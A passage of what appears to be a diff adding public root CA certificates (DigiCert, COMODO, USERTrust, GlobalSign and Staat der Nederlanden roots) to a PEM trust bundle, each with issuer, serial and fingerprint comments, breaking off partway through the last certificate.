Fingerprint: 7d:05:eb:b6:82:33:9f:8c:94:51:ee:09:4e:eb:fe:fa:79:53:a1:14:ed:b2:f4:49:49:45:2f:ab:7d:2f:c1:85 +-----BEGIN CERTIFICATE----- +MIIDljCCAn6gAwIBAgIQC5McOtY5Z+pnI7/Dr5r0SzANBgkqhkiG9w0BAQsFADBl +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv +b3QgRzIwHhcNMTMwODAxMTIwMDAwWhcNMzgwMTE1MTIwMDAwWjBlMQswCQYDVQQG +EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl +cnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgRzIwggEi +MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDZ5ygvUj82ckmIkzTz+GoeMVSA +n61UQbVH35ao1K+ALbkKz3X9iaV9JPrjIgwrvJUXCzO/GU1BBpAAvQxNEP4Htecc +biJVMWWXvdMX0h5i89vqbFCMP4QMls+3ywPgym2hFEwbid3tALBSfK+RbLE4E9Hp +EgjAALAcKxHad3A2m67OeYfcgnDmCXRwVWmvo2ifv922ebPynXApVfSr/5Vh88lA +bx3RvpO704gqu52/clpWcTs/1PPRCv4o76Pu2ZmvA9OPYLfykqGxvYmJHzDNw6Yu +YjOuFgJ3RFrngQo8p0Quebg/BLxcoIfhG69Rjs3sLPr4/m3wOnyqi+RnlTGNAgMB +AAGjQjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgGGMB0GA1UdDgQW +BBTOw0q5mVXyuNtgv6l+vVa1lzan1jANBgkqhkiG9w0BAQsFAAOCAQEAyqVVjOPI +QW5pJ6d1Ee88hjZv0p3GeDgdaZaikmkuOGybfQTUiaWxMTeKySHMq2zNixya1r9I +0jJmwYrA8y8678Dj1JGG0VDjA9tzd29KOVPt3ibHtX2vK0LRdWLjSisCx1BL4Gni +lmwORGYQRI+tBev4eaymG+g3NJ1TyWGqolKvSnAWhsI6yLETcDbYz+70CjTVW0z9 +B5yiutkBclzzTcHdDrEcDcRjvq30FPuJ7KJBDkzMyFdA0G4Dqs0MjomZmWzwPDCv +ON9vvKO+KSAnq3T/EyJ43pdSVR6DtVQgA+6uwE9W3jfMw3+qBCe703e4YtsXfJwo +IhNzbM8m9Yop5w== +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert Assured ID Root G3 O=DigiCert Inc OU=www.digicert.com +# Subject: CN=DigiCert Assured ID Root G3 O=DigiCert Inc OU=www.digicert.com +# Label: "DigiCert Assured ID Root G3" +# Serial: 15459312981008553731928384953135426796 +# MD5 Fingerprint: 7c:7f:65:31:0c:81:df:8d:ba:3e:99:e2:5c:ad:6e:fb +# SHA1 Fingerprint: f5:17:a2:4f:9a:48:c6:c9:f8:a2:00:26:9f:dc:0f:48:2c:ab:30:89 +# SHA256 Fingerprint: 7e:37:cb:8b:4c:47:09:0c:ab:36:55:1b:a6:f4:5d:b8:40:68:0f:ba:16:6a:95:2d:b1:00:71:7f:43:05:3f:c2 +-----BEGIN CERTIFICATE----- +MIICRjCCAc2gAwIBAgIQC6Fa+h3foLVJRK/NJKBs7DAKBggqhkjOPQQDAzBlMQsw +CQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cu +ZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3Qg +RzMwHhcNMTMwODAxMTIwMDAwWhcNMzgwMTE1MTIwMDAwWjBlMQswCQYDVQQGEwJV +UzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQu +Y29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgRzMwdjAQBgcq +hkjOPQIBBgUrgQQAIgNiAAQZ57ysRGXtzbg/WPuNsVepRC0FFfLvC/8QdJ+1YlJf +Zn4f5dwbRXkLzMZTCp2NXQLZqVneAlr2lSoOjThKiknGvMYDOAdfVdp+CW7if17Q +RSAPWXYQ1qAk8C3eNvJsKTmjQjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/ +BAQDAgGGMB0GA1UdDgQWBBTL0L2p4ZgFUaFNN6KDec6NHSrkhDAKBggqhkjOPQQD +AwNnADBkAjAlpIFFAmsSS3V0T8gj43DydXLefInwz5FyYZ5eEJJZVrmDxxDnOOlY +JjZ91eQ0hjkCMHw2U/Aw5WJjOpnitqM7mzT6HtoQknFekROn3aRukswy1vUhZscv +6pZjamVFkpUBtA== +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert Global Root G2 O=DigiCert Inc OU=www.digicert.com +# Subject: CN=DigiCert Global Root G2 O=DigiCert Inc OU=www.digicert.com +# Label: "DigiCert Global Root G2" +# Serial: 4293743540046975378534879503202253541 +# MD5 Fingerprint: e4:a6:8a:c8:54:ac:52:42:46:0a:fd:72:48:1b:2a:44 +# SHA1 Fingerprint: df:3c:24:f9:bf:d6:66:76:1b:26:80:73:fe:06:d1:cc:8d:4f:82:a4 +# SHA256 Fingerprint: cb:3c:cb:b7:60:31:e5:e0:13:8f:8d:d3:9a:23:f9:de:47:ff:c3:5e:43:c1:14:4c:ea:27:d4:6a:5a:b1:cb:5f +-----BEGIN CERTIFICATE----- +MIIDjjCCAnagAwIBAgIQAzrx5qcRqaC7KGSxHQn65TANBgkqhkiG9w0BAQsFADBh +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBH +MjAeFw0xMzA4MDExMjAwMDBaFw0zODAxMTUxMjAwMDBaMGExCzAJBgNVBAYTAlVT +MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j +b20xIDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IEcyMIIBIjANBgkqhkiG +9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuzfNNNx7a8myaJCtSnX/RrohCgiN9RlUyfuI +2/Ou8jqJkTx65qsGGmvPrC3oXgkkRLpimn7Wo6h+4FR1IAWsULecYxpsMNzaHxmx +1x7e/dfgy5SDN67sH0NO3Xss0r0upS/kqbitOtSZpLYl6ZtrAGCSYP9PIUkY92eQ +q2EGnI/yuum06ZIya7XzV+hdG82MHauVBJVJ8zUtluNJbd134/tJS7SsVQepj5Wz +tCO7TG1F8PapspUwtP1MVYwnSlcUfIKdzXOS0xZKBgyMUNGPHgm+F6HmIcr9g+UQ +vIOlCsRnKPZzFBQ9RnbDhxSJITRNrw9FDKZJobq7nMWxM4MphQIDAQABo0IwQDAP +BgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBhjAdBgNVHQ4EFgQUTiJUIBiV +5uNu5g/6+rkS7QYXjzkwDQYJKoZIhvcNAQELBQADggEBAGBnKJRvDkhj6zHd6mcY +1Yl9PMWLSn/pvtsrF9+wX3N3KjITOYFnQoQj8kVnNeyIv/iPsGEMNKSuIEyExtv4 +NeF22d+mQrvHRAiGfzZ0JFrabA0UWTW98kndth/Jsw1HKj2ZL7tcu7XUIOGZX1NG +Fdtom/DzMNU+MeKNhJ7jitralj41E6Vf8PlwUHBHQRFXGU7Aj64GxJUTFy8bJZ91 +8rGOmaFvE7FBcf6IKshPECBV1/MUReXgRPTqh5Uykw7+U0b6LJ3/iyK5S9kJRaTe +pLiaWN0bfVKfjllDiIGknibVb63dDcY3fe0Dkhvld1927jyNxF1WW6LZZm6zNTfl +MrY= +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert Global Root G3 O=DigiCert Inc OU=www.digicert.com +# Subject: CN=DigiCert Global Root G3 O=DigiCert Inc OU=www.digicert.com +# Label: "DigiCert Global Root G3" +# Serial: 7089244469030293291760083333884364146 +# MD5 Fingerprint: f5:5d:a4:50:a5:fb:28:7e:1e:0f:0d:cc:96:57:56:ca +# SHA1 Fingerprint: 7e:04:de:89:6a:3e:66:6d:00:e6:87:d3:3f:fa:d9:3b:e8:3d:34:9e +# SHA256 Fingerprint: 31:ad:66:48:f8:10:41:38:c7:38:f3:9e:a4:32:01:33:39:3e:3a:18:cc:02:29:6e:f9:7c:2a:c9:ef:67:31:d0 +-----BEGIN CERTIFICATE----- +MIICPzCCAcWgAwIBAgIQBVVWvPJepDU1w6QP1atFcjAKBggqhkjOPQQDAzBhMQsw +CQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cu +ZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBHMzAe +Fw0xMzA4MDExMjAwMDBaFw0zODAxMTUxMjAwMDBaMGExCzAJBgNVBAYTAlVTMRUw +EwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20x +IDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IEczMHYwEAYHKoZIzj0CAQYF +K4EEACIDYgAE3afZu4q4C/sLfyHS8L6+c/MzXRq8NOrexpu80JX28MzQC7phW1FG +fp4tn+6OYwwX7Adw9c+ELkCDnOg/QW07rdOkFFk2eJ0DQ+4QE2xy3q6Ip6FrtUPO +Z9wj/wMco+I+o0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBhjAd +BgNVHQ4EFgQUs9tIpPmhxdiuNkHMEWNpYim8S8YwCgYIKoZIzj0EAwMDaAAwZQIx +AK288mw/EkrRLTnDCgmXc/SINoyIJ7vmiI1Qhadj+Z4y3maTD/HMsQmP3Wyr+mt/ +oAIwOWZbwmSNuJ5Q3KjVSaLtx9zRSX8XAbjIho9OjIgrqJqpisXRAL34VOKa5Vt8 +sycX +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert Trusted Root G4 O=DigiCert Inc OU=www.digicert.com +# Subject: CN=DigiCert Trusted Root G4 O=DigiCert Inc OU=www.digicert.com +# Label: "DigiCert Trusted Root G4" +# Serial: 7451500558977370777930084869016614236 +# MD5 Fingerprint: 78:f2:fc:aa:60:1f:2f:b4:eb:c9:37:ba:53:2e:75:49 +# SHA1 Fingerprint: dd:fb:16:cd:49:31:c9:73:a2:03:7d:3f:c8:3a:4d:7d:77:5d:05:e4 +# SHA256 Fingerprint: 55:2f:7b:dc:f1:a7:af:9e:6c:e6:72:01:7f:4f:12:ab:f7:72:40:c7:8e:76:1a:c2:03:d1:d9:d2:0a:c8:99:88 +-----BEGIN CERTIFICATE----- +MIIFkDCCA3igAwIBAgIQBZsbV56OITLiOQe9p3d1XDANBgkqhkiG9w0BAQwFADBi +MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 +d3cuZGlnaWNlcnQuY29tMSEwHwYDVQQDExhEaWdpQ2VydCBUcnVzdGVkIFJvb3Qg +RzQwHhcNMTMwODAxMTIwMDAwWhcNMzgwMTE1MTIwMDAwWjBiMQswCQYDVQQGEwJV +UzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQu +Y29tMSEwHwYDVQQDExhEaWdpQ2VydCBUcnVzdGVkIFJvb3QgRzQwggIiMA0GCSqG +SIb3DQEBAQUAA4ICDwAwggIKAoICAQC/5pBzaN675F1KPDAiMGkz7MKnJS7JIT3y +ithZwuEppz1Yq3aaza57G4QNxDAf8xukOBbrVsaXbR2rsnnyyhHS5F/WBTxSD1If +xp4VpX6+n6lXFllVcq9ok3DCsrp1mWpzMpTREEQQLt+C8weE5nQ7bXHiLQwb7iDV +ySAdYyktzuxeTsiT+CFhmzTrBcZe7FsavOvJz82sNEBfsXpm7nfISKhmV1efVFiO +DCu3T6cw2Vbuyntd463JT17lNecxy9qTXtyOj4DatpGYQJB5w3jHtrHEtWoYOAMQ +jdjUN6QuBX2I9YI+EJFwq1WCQTLX2wRzKm6RAXwhTNS8rhsDdV14Ztk6MUSaM0C/ +CNdaSaTC5qmgZ92kJ7yhTzm1EVgX9yRcRo9k98FpiHaYdj1ZXUJ2h4mXaXpI8OCi +EhtmmnTK3kse5w5jrubU75KSOp493ADkRSWJtppEGSt+wJS00mFt6zPZxd9LBADM +fRyVw4/3IbKyEbe7f/LVjHAsQWCqsWMYRJUadmJ+9oCw++hkpjPRiQfhvbfmQ6QY +uKZ3AeEPlAwhHbJUKSWJbOUOUlFHdL4mrLZBdd56rF+NP8m800ERElvlEFDrMcXK +chYiCd98THU/Y+whX8QgUWtvsauGi0/C1kVfnSD8oR7FwI+isX4KJpn15GkvmB0t +9dmpsh3lGwIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIB +hjAdBgNVHQ4EFgQU7NfjgtJxXWRM3y5nP+e6mK4cD08wDQYJKoZIhvcNAQEMBQAD +ggIBALth2X2pbL4XxJEbw6GiAI3jZGgPVs93rnD5/ZpKmbnJeFwMDF/k5hQpVgs2 +SV1EY+CtnJYYZhsjDT156W1r1lT40jzBQ0CuHVD1UvyQO7uYmWlrx8GnqGikJ9yd ++SeuMIW59mdNOj6PWTkiU0TryF0Dyu1Qen1iIQqAyHNm0aAFYF/opbSnr6j3bTWc +fFqK1qI4mfN4i/RN0iAL3gTujJtHgXINwBQy7zBZLq7gcfJW5GqXb5JQbZaNaHqa +sjYUegbyJLkJEVDXCLG4iXqEI2FCKeWjzaIgQdfRnGTZ6iahixTXTBmyUEFxPT9N +cCOGDErcgdLMMpSEDQgJlxxPwO5rIHQw0uA5NBCFIRUBCOhVMt5xSdkoF1BN5r5N +0XWs0Mr7QbhDparTwwVETyw2m+L64kW4I1NsBm9nVX9GtUw/bihaeSbSpKhil9Ie +4u1Ki7wb/UdKDd9nZn6yW0HQO+T0O/QEY+nvwlQAUaCKKsnOeMzV6ocEGLPOr0mI +r/OSmbaz5mEP0oUA51Aa5BuVnRmhuZyxm7EAHu/QD09CbMkKvO5D+jpxpchNJqU1 +/YldvIViHTLSoCtU7ZpXwdv6EM8Zt4tKG48BtieVU+i2iW1bvGjUI+iLUaJW+fCm +gKDWHrO8Dw9TdSmq6hN35N6MgSGtBxBHEa2HPQfRdbzP82Z+ +-----END CERTIFICATE----- + +# Issuer: CN=COMODO RSA Certification Authority O=COMODO CA Limited +# Subject: CN=COMODO RSA Certification Authority O=COMODO CA Limited +# Label: "COMODO RSA Certification Authority" +# Serial: 101909084537582093308941363524873193117 +# MD5 Fingerprint: 1b:31:b0:71:40:36:cc:14:36:91:ad:c4:3e:fd:ec:18 +# SHA1 Fingerprint: af:e5:d2:44:a8:d1:19:42:30:ff:47:9f:e2:f8:97:bb:cd:7a:8c:b4 +# SHA256 Fingerprint: 52:f0:e1:c4:e5:8e:c6:29:29:1b:60:31:7f:07:46:71:b8:5d:7e:a8:0d:5b:07:27:34:63:53:4b:32:b4:02:34 +-----BEGIN CERTIFICATE----- +MIIF2DCCA8CgAwIBAgIQTKr5yttjb+Af907YWwOGnTANBgkqhkiG9w0BAQwFADCB +hTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G +A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxKzApBgNV +BAMTIkNPTU9ETyBSU0EgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMTAwMTE5 +MDAwMDAwWhcNMzgwMTE4MjM1OTU5WjCBhTELMAkGA1UEBhMCR0IxGzAZBgNVBAgT +EkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEaMBgGA1UEChMR +Q09NT0RPIENBIExpbWl0ZWQxKzApBgNVBAMTIkNPTU9ETyBSU0EgQ2VydGlmaWNh +dGlvbiBBdXRob3JpdHkwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCR +6FSS0gpWsawNJN3Fz0RndJkrN6N9I3AAcbxT38T6KhKPS38QVr2fcHK3YX/JSw8X +pz3jsARh7v8Rl8f0hj4K+j5c+ZPmNHrZFGvnnLOFoIJ6dq9xkNfs/Q36nGz637CC +9BR++b7Epi9Pf5l/tfxnQ3K9DADWietrLNPtj5gcFKt+5eNu/Nio5JIk2kNrYrhV +/erBvGy2i/MOjZrkm2xpmfh4SDBF1a3hDTxFYPwyllEnvGfDyi62a+pGx8cgoLEf +Zd5ICLqkTqnyg0Y3hOvozIFIQ2dOciqbXL1MGyiKXCJ7tKuY2e7gUYPDCUZObT6Z ++pUX2nwzV0E8jVHtC7ZcryxjGt9XyD+86V3Em69FmeKjWiS0uqlWPc9vqv9JWL7w +qP/0uK3pN/u6uPQLOvnoQ0IeidiEyxPx2bvhiWC4jChWrBQdnArncevPDt09qZah +SL0896+1DSJMwBGB7FY79tOi4lu3sgQiUpWAk2nojkxl8ZEDLXB0AuqLZxUpaVIC +u9ffUGpVRr+goyhhf3DQw6KqLCGqR84onAZFdr+CGCe01a60y1Dma/RMhnEw6abf +Fobg2P9A3fvQQoh/ozM6LlweQRGBY84YcWsr7KaKtzFcOmpH4MN5WdYgGq/yapiq +crxXStJLnbsQ/LBMQeXtHT1eKJ2czL+zUdqnR+WEUwIDAQABo0IwQDAdBgNVHQ4E +FgQUu69+Aj36pvE8hI6t7jiY7NkyMtQwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB +/wQFMAMBAf8wDQYJKoZIhvcNAQEMBQADggIBAArx1UaEt65Ru2yyTUEUAJNMnMvl +wFTPoCWOAvn9sKIN9SCYPBMtrFaisNZ+EZLpLrqeLppysb0ZRGxhNaKatBYSaVqM +4dc+pBroLwP0rmEdEBsqpIt6xf4FpuHA1sj+nq6PK7o9mfjYcwlYRm6mnPTXJ9OV +2jeDchzTc+CiR5kDOF3VSXkAKRzH7JsgHAckaVd4sjn8OoSgtZx8jb8uk2Intzna +FxiuvTwJaP+EmzzV1gsD41eeFPfR60/IvYcjt7ZJQ3mFXLrrkguhxuhoqEwWsRqZ +CuhTLJK7oQkYdQxlqHvLI7cawiiFwxv/0Cti76R7CZGYZ4wUAc1oBmpjIXUDgIiK +boHGhfKppC3n9KUkEEeDys30jXlYsQab5xoq2Z0B15R97QNKyvDb6KkBPvVWmcke +jkk9u+UJueBPSZI9FoJAzMxZxuY67RIuaTxslbH9qh17f4a+Hg4yRvv7E491f0yL +S0Zj/gA0QHDBw7mh3aZw4gSzQbzpgJHqZJx64SIDqZxubw5lT2yHh17zbqD5daWb +QOhTsiedSrnAdyGN/4fy3ryM7xfft0kL0fJuMAsaDk527RH89elWsn2/x20Kk4yl +0MC2Hb46TpSi125sC8KKfPog88Tk5c0NqMuRkrF8hey1FGlmDoLnzc7ILaZRfyHB +NVOFBkpdn627G190 +-----END CERTIFICATE----- + +# Issuer: CN=USERTrust RSA Certification Authority O=The USERTRUST Network +# Subject: CN=USERTrust RSA Certification Authority O=The USERTRUST Network +# Label: "USERTrust RSA Certification Authority" +# Serial: 2645093764781058787591871645665788717 +# MD5 Fingerprint: 1b:fe:69:d1:91:b7:19:33:a3:72:a8:0f:e1:55:e5:b5 +# SHA1 Fingerprint: 2b:8f:1b:57:33:0d:bb:a2:d0:7a:6c:51:f7:0e:e9:0d:da:b9:ad:8e +# SHA256 Fingerprint: e7:93:c9:b0:2f:d8:aa:13:e2:1c:31:22:8a:cc:b0:81:19:64:3b:74:9c:89:89:64:b1:74:6d:46:c3:d4:cb:d2 +-----BEGIN CERTIFICATE----- +MIIF3jCCA8agAwIBAgIQAf1tMPyjylGoG7xkDjUDLTANBgkqhkiG9w0BAQwFADCB +iDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCk5ldyBKZXJzZXkxFDASBgNVBAcTC0pl +cnNleSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNV +BAMTJVVTRVJUcnVzdCBSU0EgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMTAw +MjAxMDAwMDAwWhcNMzgwMTE4MjM1OTU5WjCBiDELMAkGA1UEBhMCVVMxEzARBgNV +BAgTCk5ldyBKZXJzZXkxFDASBgNVBAcTC0plcnNleSBDaXR5MR4wHAYDVQQKExVU +aGUgVVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNVBAMTJVVTRVJUcnVzdCBSU0EgQ2Vy +dGlmaWNhdGlvbiBBdXRob3JpdHkwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK +AoICAQCAEmUXNg7D2wiz0KxXDXbtzSfTTK1Qg2HiqiBNCS1kCdzOiZ/MPans9s/B +3PHTsdZ7NygRK0faOca8Ohm0X6a9fZ2jY0K2dvKpOyuR+OJv0OwWIJAJPuLodMkY +tJHUYmTbf6MG8YgYapAiPLz+E/CHFHv25B+O1ORRxhFnRghRy4YUVD+8M/5+bJz/ +Fp0YvVGONaanZshyZ9shZrHUm3gDwFA66Mzw3LyeTP6vBZY1H1dat//O+T23LLb2 +VN3I5xI6Ta5MirdcmrS3ID3KfyI0rn47aGYBROcBTkZTmzNg95S+UzeQc0PzMsNT +79uq/nROacdrjGCT3sTHDN/hMq7MkztReJVni+49Vv4M0GkPGw/zJSZrM233bkf6 +c0Plfg6lZrEpfDKEY1WJxA3Bk1QwGROs0303p+tdOmw1XNtB1xLaqUkL39iAigmT +Yo61Zs8liM2EuLE/pDkP2QKe6xJMlXzzawWpXhaDzLhn4ugTncxbgtNMs+1b/97l +c6wjOy0AvzVVdAlJ2ElYGn+SNuZRkg7zJn0cTRe8yexDJtC/QV9AqURE9JnnV4ee +UB9XVKg+/XRjL7FQZQnmWEIuQxpMtPAlR1n6BB6T1CZGSlCBst6+eLf8ZxXhyVeE +Hg9j1uliutZfVS7qXMYoCAQlObgOK6nyTJccBz8NUvXt7y+CDwIDAQABo0IwQDAd +BgNVHQ4EFgQUU3m/WqorSs9UgOHYm8Cd8rIDZsswDgYDVR0PAQH/BAQDAgEGMA8G +A1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEMBQADggIBAFzUfA3P9wF9QZllDHPF +Up/L+M+ZBn8b2kMVn54CVVeWFPFSPCeHlCjtHzoBN6J2/FNQwISbxmtOuowhT6KO +VWKR82kV2LyI48SqC/3vqOlLVSoGIG1VeCkZ7l8wXEskEVX/JJpuXior7gtNn3/3 +ATiUFJVDBwn7YKnuHKsSjKCaXqeYalltiz8I+8jRRa8YFWSQEg9zKC7F4iRO/Fjs +8PRF/iKz6y+O0tlFYQXBl2+odnKPi4w2r78NBc5xjeambx9spnFixdjQg3IM8WcR +iQycE0xyNN+81XHfqnHd4blsjDwSXWXavVcStkNr/+XeTWYRUc+ZruwXtuhxkYze +Sf7dNXGiFSeUHM9h4ya7b6NnJSFd5t0dCy5oGzuCr+yDZ4XUmFF0sbmZgIn/f3gZ +XHlKYC6SQK5MNyosycdiyA5d9zZbyuAlJQG03RoHnHcAP9Dc1ew91Pq7P8yF1m9/ +qS3fuQL39ZeatTXaw2ewh0qpKJ4jjv9cJ2vhsE/zB+4ALtRZh8tSQZXq9EfX7mRB +VXyNWQKV3WKdwrnuWih0hKWbt5DHDAff9Yk2dDLWKMGwsAvgnEzDHNb842m1R0aB +L6KCq9NjRHDEjf8tM7qtj3u1cIiuPhnPQCjY/MiQu12ZIvVS5ljFH4gxQ+6IHdfG +jjxDah2nGN59PRbxYvnKkKj9 +-----END CERTIFICATE----- + +# Issuer: CN=USERTrust ECC Certification Authority O=The USERTRUST Network +# Subject: CN=USERTrust ECC Certification Authority O=The USERTRUST Network +# Label: "USERTrust ECC Certification Authority" +# Serial: 123013823720199481456569720443997572134 +# MD5 Fingerprint: fa:68:bc:d9:b5:7f:ad:fd:c9:1d:06:83:28:cc:24:c1 +# SHA1 Fingerprint: d1:cb:ca:5d:b2:d5:2a:7f:69:3b:67:4d:e5:f0:5a:1d:0c:95:7d:f0 +# SHA256 Fingerprint: 4f:f4:60:d5:4b:9c:86:da:bf:bc:fc:57:12:e0:40:0d:2b:ed:3f:bc:4d:4f:bd:aa:86:e0:6a:dc:d2:a9:ad:7a +-----BEGIN CERTIFICATE----- +MIICjzCCAhWgAwIBAgIQXIuZxVqUxdJxVt7NiYDMJjAKBggqhkjOPQQDAzCBiDEL +MAkGA1UEBhMCVVMxEzARBgNVBAgTCk5ldyBKZXJzZXkxFDASBgNVBAcTC0plcnNl +eSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNVBAMT +JVVTRVJUcnVzdCBFQ0MgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMTAwMjAx +MDAwMDAwWhcNMzgwMTE4MjM1OTU5WjCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT +Ck5ldyBKZXJzZXkxFDASBgNVBAcTC0plcnNleSBDaXR5MR4wHAYDVQQKExVUaGUg +VVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNVBAMTJVVTRVJUcnVzdCBFQ0MgQ2VydGlm +aWNhdGlvbiBBdXRob3JpdHkwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQarFRaqflo +I+d61SRvU8Za2EurxtW20eZzca7dnNYMYf3boIkDuAUU7FfO7l0/4iGzzvfUinng +o4N+LZfQYcTxmdwlkWOrfzCjtHDix6EznPO/LlxTsV+zfTJ/ijTjeXmjQjBAMB0G +A1UdDgQWBBQ64QmG1M8ZwpZ2dEl23OA1xmNjmjAOBgNVHQ8BAf8EBAMCAQYwDwYD +VR0TAQH/BAUwAwEB/zAKBggqhkjOPQQDAwNoADBlAjA2Z6EWCNzklwBBHU6+4WMB +zzuqQhFkoJ2UOQIReVx7Hfpkue4WQrO/isIJxOzksU0CMQDpKmFHjFJKS04YcPbW +RNZu9YO6bVi9JNlWSOrvxKJGgYhqOkbRqZtNyWHa0V1Xahg= +-----END CERTIFICATE----- + +# Issuer: CN=GlobalSign O=GlobalSign OU=GlobalSign ECC Root CA - R5 +# Subject: CN=GlobalSign O=GlobalSign OU=GlobalSign ECC Root CA - R5 +# Label: "GlobalSign ECC Root CA - R5" +# Serial: 32785792099990507226680698011560947931244 +# MD5 Fingerprint: 9f:ad:3b:1c:02:1e:8a:ba:17:74:38:81:0c:a2:bc:08 +# SHA1 Fingerprint: 1f:24:c6:30:cd:a4:18:ef:20:69:ff:ad:4f:dd:5f:46:3a:1b:69:aa +# SHA256 Fingerprint: 17:9f:bc:14:8a:3d:d0:0f:d2:4e:a1:34:58:cc:43:bf:a7:f5:9c:81:82:d7:83:a5:13:f6:eb:ec:10:0c:89:24 +-----BEGIN CERTIFICATE----- +MIICHjCCAaSgAwIBAgIRYFlJ4CYuu1X5CneKcflK2GwwCgYIKoZIzj0EAwMwUDEk +MCIGA1UECxMbR2xvYmFsU2lnbiBFQ0MgUm9vdCBDQSAtIFI1MRMwEQYDVQQKEwpH +bG9iYWxTaWduMRMwEQYDVQQDEwpHbG9iYWxTaWduMB4XDTEyMTExMzAwMDAwMFoX +DTM4MDExOTAzMTQwN1owUDEkMCIGA1UECxMbR2xvYmFsU2lnbiBFQ0MgUm9vdCBD +QSAtIFI1MRMwEQYDVQQKEwpHbG9iYWxTaWduMRMwEQYDVQQDEwpHbG9iYWxTaWdu +MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAER0UOlvt9Xb/pOdEh+J8LttV7HpI6SFkc +8GIxLcB6KP4ap1yztsyX50XUWPrRd21DosCHZTQKH3rd6zwzocWdTaRvQZU4f8ke +hOvRnkmSh5SHDDqFSmafnVmTTZdhBoZKo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYD +VR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUPeYpSJvqB8ohREom3m7e0oPQn1kwCgYI +KoZIzj0EAwMDaAAwZQIxAOVpEslu28YxuglB4Zf4+/2a4n0Sye18ZNPLBSWLVtmg +515dTguDnFt2KaAJJiFqYgIwcdK1j1zqO+F4CYWodZI7yFz9SO8NdCKoCOJuxUnO +xwy8p2Fp8fc74SrL+SvzZpA3 +-----END CERTIFICATE----- + +# Issuer: CN=Staat der Nederlanden EV Root CA O=Staat der Nederlanden +# Subject: CN=Staat der Nederlanden EV Root CA O=Staat der Nederlanden +# Label: "Staat der Nederlanden EV Root CA" +# Serial: 10000013 +# MD5 Fingerprint: fc:06:af:7b:e8:1a:f1:9a:b4:e8:d2:70:1f:c0:f5:ba +# SHA1 Fingerprint: 76:e2:7e:c1:4f:db:82:c1:c0:a6:75:b5:05:be:3d:29:b4:ed:db:bb +# SHA256 Fingerprint: 4d:24:91:41:4c:fe:95:67:46:ec:4c:ef:a6:cf:6f:72:e2:8a:13:29:43:2f:9d:8a:90:7a:c4:cb:5d:ad:c1:5a +-----BEGIN CERTIFICATE----- +MIIFcDCCA1igAwIBAgIEAJiWjTANBgkqhkiG9w0BAQsFADBYMQswCQYDVQQGEwJO +TDEeMBwGA1UECgwVU3RhYXQgZGVyIE5lZGVybGFuZGVuMSkwJwYDVQQDDCBTdGFh +dCBkZXIgTmVkZXJsYW5kZW4gRVYgUm9vdCBDQTAeFw0xMDEyMDgxMTE5MjlaFw0y 